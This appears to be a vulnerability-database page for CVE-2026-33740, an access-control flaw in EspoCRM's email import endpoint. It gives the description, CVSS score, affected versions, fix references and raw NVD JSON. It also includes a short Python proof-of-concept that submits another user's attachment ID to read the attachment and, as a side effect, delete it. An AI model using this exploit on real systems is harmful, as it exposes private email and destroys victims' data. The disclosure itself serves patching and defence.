CVE-2026-33740

Description

EspoCRM is an open source customer relationship management application. In versions 9.3.3 and below, the POST /api/v1/Email/importEml endpoint contains an Insecure Direct Object Reference (IDOR) vulnerability where the attacker-supplied fileId parameter is used to fetch any attachment directly from the repository without verifying that the current user has authorization to access it. Any authenticated user with Email:create and Import permissions can exploit this to read another user's .eml attachment contents by importing them as a new email into the attacker's mailbox, while the original victim attachment record is deleted as a side effect of the import flow. This is inconsistent with the standard attachment download path, which enforces ACL checks before returning file data, and is practically exploitable because attachment IDs are commonly exposed in normal UI and API workflows such as stream payloads and download links. This issue is fixed in version 9.3.4.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:* - VULNERABLE

EspoCRM <= 9.3.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url, session_cookie, victim_file_id):
    """
    Exploit CVE-2026-33740 IDOR in EspoCRM.
    Requires 'Email:create' and 'Import' permissions.
    """
    endpoint = f"{target_url}/api/v1/Email/importEml"
    
    headers = {
        "Cookie": f"espo-key={session_cookie}"
    }
    
    data = {
        "fileId": victim_file_id
    }
    
    response = requests.post(endpoint, headers=headers, data=data)
    
    if response.status_code == 200:
        print("[+] Success: Attachment imported.")
        print(response.text)
    else:
        print("[-] Failed: Check permissions or ID.")

# Example usage
# exploit("http://localhost", "attacker_session", "target_attachment_id")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33740
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33740
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33740/
[4] VulDB https://vuldb.com/cve/CVE-2026-33740
[5] https://github.com/espocrm/espocrm/commit/88e3ba6a7b5cab5dbc2298e2a093d3aa383aa95f
[6] https://github.com/espocrm/espocrm/releases/tag/9.3.4
[7] https://github.com/espocrm/espocrm/security/advisories/GHSA-wr7j-hxf8-hc4w

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33740", "sourceIdentifier": "[email protected]", "published": "2026-04-13T21:16:25.007", "lastModified": "2026-04-22T00:04:34.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EspoCRM is an open source customer relationship management application. In versions 9.3.3 and below, the POST /api/v1/Email/importEml endpoint contains an Insecure Direct Object Reference (IDOR) vulnerability where the attacker-supplied fileId parameter is used to fetch any attachment directly from the repository without verifying that the current user has authorization to access it. Any authenticated user with Email:create and Import permissions can exploit this to read another user's .eml attachment contents by importing them as a new email into the attacker's mailbox, while the original victim attachment record is deleted as a side effect of the import flow. This is inconsistent with the standard attachment download path, which enforces ACL checks before returning file data, and is practically exploitable because attachment IDs are commonly exposed in normal UI and API workflows such as stream payloads and download links. This issue is fixed in version 9.3.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.3.4", "matchCriteriaId": "C81517CA-6567-41DC-A0A9-309FFD7B48E8"}]}]}], "references": [{"url": "https://github.com/espocrm/espocrm/commit/88e3ba6a7b5cab5dbc2298e2a093d3aa383aa95f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/espocrm/espocrm/releases/tag/9.3.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/espocrm/espocrm/security/advisories/GHSA-wr7j-hxf8-hc4w", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}